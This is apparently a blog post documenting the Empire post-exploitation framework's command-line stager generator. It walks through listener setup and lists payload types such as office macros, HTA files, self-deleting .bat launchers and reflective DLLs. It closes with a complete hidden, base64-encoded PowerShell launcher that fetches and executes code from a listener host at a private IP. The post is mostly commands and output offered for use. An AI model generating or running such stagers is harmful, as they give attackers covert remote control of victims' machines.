This post is part of the ‘Empire Series’ with some background and an ongoing list of series posts [kept here].
Recently, an Empire user requested that we build a ‘standalone payload generator’, similar to msfvenom’s functionality. The motivation is to provide a scriptable capability that makes integration with other tools relatively easy. This short post will cover the newly integrated command line options for Empire which allow for the scripted generation of stagers.
To display the currently available options, run ./empire -h
# ./empire -h usage: empire [-h] [--debug [DEBUG]] [-s [STAGER]] [-o [STAGER_OPTIONS [STAGER_OPTIONS ...]]] [-l [LISTENER]] [-v] optional arguments: -h, --help show this help message and exit --debug [DEBUG] Debug level for output (default of 1). -s [STAGER], --stager [STAGER] Specify a stager to generate. Lists all stagers if none is specified. -o [STAGER_OPTIONS [STAGER_OPTIONS ...]], --stager-options [STAGER_OPTIONS [STAGER_OPTIONS ...]] Supply options to set for a stager in OPTION=VALUE format. Lists options if nothing is specified. -l [LISTENER], --listener [LISTENER] Display listener options. Displays all listeners if nothing is specified. -v, --version Display current Empire version.
In order to effectively use Empire’s CLI, you need to have a listener currently set up so the data is stored in the backend empire.db database. In order to generate the stagers, an ./empire instance doesn’t have to be running at the same time (though it can be), but it does need to be executed from the same path as the Empire installation containing the configured listeners.
In order to display the active listeners, use ./empire -l
# ./empire -l [*] Active listeners: ID Name Host Type Delay/Jitter KillDate Redirect Target -- ---- ---- ------- ------------ -------- --------------- 1 test http://192.168.52.142:8080 native 5/0.0
To display the configuration for a particular listener, use ./empire -l <listener_name>
# ./empire -l test Listener Options: Name Required Value Description ---- -------- ------- ----------- KillDate False Date for the listener to exit (MM/dd/yyyy). Name True test Listener name. DefaultLostLimit True 60 Number of missed checkins before exiting StagingKey True 2c103f2c4ed1e59c0b4e2e01821770fa Staging key for initial agent negotiation. Type True native Listener type (native, pivot, hop). ID True 1 Listener ID. RedirectTarget False Listener target to redirect to for pivot/hop. DefaultDelay True 5 Agent delay/reach back interval (in seconds). WorkingHours False Hours for the agent to operate (09:00-17:00). Host True http://192.168.52.139:8080 Hostname/IP for staging. CertPath False Certificate path for https listeners. DefaultJitter True 0.0 Jitter in agent reachback interval (0.0-1.0). DefaultProfile True /admin/get.php,/news.asp,/login/ Default communication profile for the agent. process.jsp|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Port True 8080 Port for the listener.
If you want to display the available Empire stagers, use ./empire -s
# ./empire -s Stagers: Name Description ---- ----------- ducky Generates a ducky script that runes a one-liner stage0 launcher for Empire. hta Generates an HTA (HyperText Application) For Internet Explorer launcher Generates a one-liner stage0 launcher for Empire. macro Generates an office macro for Empire, compatible with office 97-2003, and 2007 file types. launcher_bat Generates a self-deleting .bat launcher for Empire. dll Generate a PowerPick Reflective DLL to inject with stager code. launcher_vbs Generates a .vbs launcher for Empire. stager Generates a (stage1) key-negotiation stager for Empire. pth_wmis Generates a pth-wmis launcher for Empire. war Generates a Deployable War file. hop_php Generates a hop.php redirector for an Empire listener.
To see the configurable options for a given stager, use ./empire -s <stager_name>
# ./empire -s launcher Name: Launcher Description: Generates a one-liner stage0 launcher for Empire. Options: Name Required Value Description ---- -------- ------- ----------- ProxyCreds False default Proxy credentials ([domain\]username:password) to use for request (default, none, or other). Base64 True True Switch. Base64 encode the output. Listener True Listener to generate stager for. OutFile False File to output launcher to, otherwise displayed on the screen. Proxy False default Proxy to use for request (default, none, or other). UserAgent False default User-agent string to use for the staging request (default, none, or other).
And finally, to generate a given stager, use the -o OPTION1=VALUE1 OPTION2=VALUE2 format. Be sure to note which options are required from the above configuration display.
# ./empire -s launcher -o Listener=test powershell.exe -NoP -NonI -W Hidden -Enc JAB3AGMAPQBOAEUAdwAtAE8AYgBKAGUAQwB0ACAAUwBZAHMAVABFAE0ALgBOAGUAVAAuAFcARQBiAEMAbABJAGUAbgB0ADsAJAB1AD0AJwBNAG8AegBpAGwAbABhAC8ANQAuADAAIAAoAFcAaQBuAGQAbwB3AHMAIABOAFQAIAA2AC4AMQA7ACAAVwBPAFcANgA0ADsAIABUAHIAaQBkAGUAbgB0AC8ANwAuADAAOwAgAHIAdgA6ADEAMQAuADAAKQAgAGwAaQBrAGUAIABHAGUAYwBrAG8AJwA7ACQAVwBjAC4ASABlAEEARABFAHIAcwAuAEEARABkACgAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcALAAkAHUAKQA7ACQAdwBDAC4AUAByAE8AWABZACAAPQAgAFsAUwB5AFMAVABFAE0ALgBOAEUAVAAuAFcAZQBiAFIARQBxAHUARQBzAHQAXQA6ADoARABlAGYAYQB1AGwAVABXAGUAQgBQAHIATwB4AFkAOwAkAFcAQwAuAFAAUgBPAFgAWQAuAEMAUgBFAGQARQBOAHQASQBhAGwAcwAgAD0AIABbAFMAWQBTAFQARQBNAC4ATgBFAHQALgBDAFIARQBkAGUAbgBUAGkAQQBsAEMAYQBDAGgAZQBdADoAOgBEAEUAZgBBAFUAbAB0AE4ARQB0AFcATwByAGsAQwByAEUAZABFAG4AdABpAEEATABTADsAJABLAD0AJwAyAGMAMQAwADMAZgAyAGMANABlAGQAMQBlADUAOQBjADAAYgA0AGUAMgBlADAAMQA4ADIAMQA3ADcAMABmAGEAJwA7ACQASQA9ADAAOwBbAGMASABBAHIAWwBdAF0AJABCAD0AKABbAEMASABBAHIAWwBdAF0AKAAkAFcAQwAuAEQAbwB3AG4ATABvAEEARABTAHQAcgBJAG4AZwAoACIAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4ANQAyAC4AMQAzADkAOgA4ADAAOAAwAC8AaQBuAGQAZQB4AC4AYQBzAHAAIgApACkAKQB8ACUAewAkAF8ALQBCAFgATwByACQAawBbACQASQArACsAJQAkAEsALgBMAGUATgBHAHQAaABdAH0AOwBJAEUAWAAgACgAJABCAC0AagBPAEkAbgAnACcAKQA=
Have fun!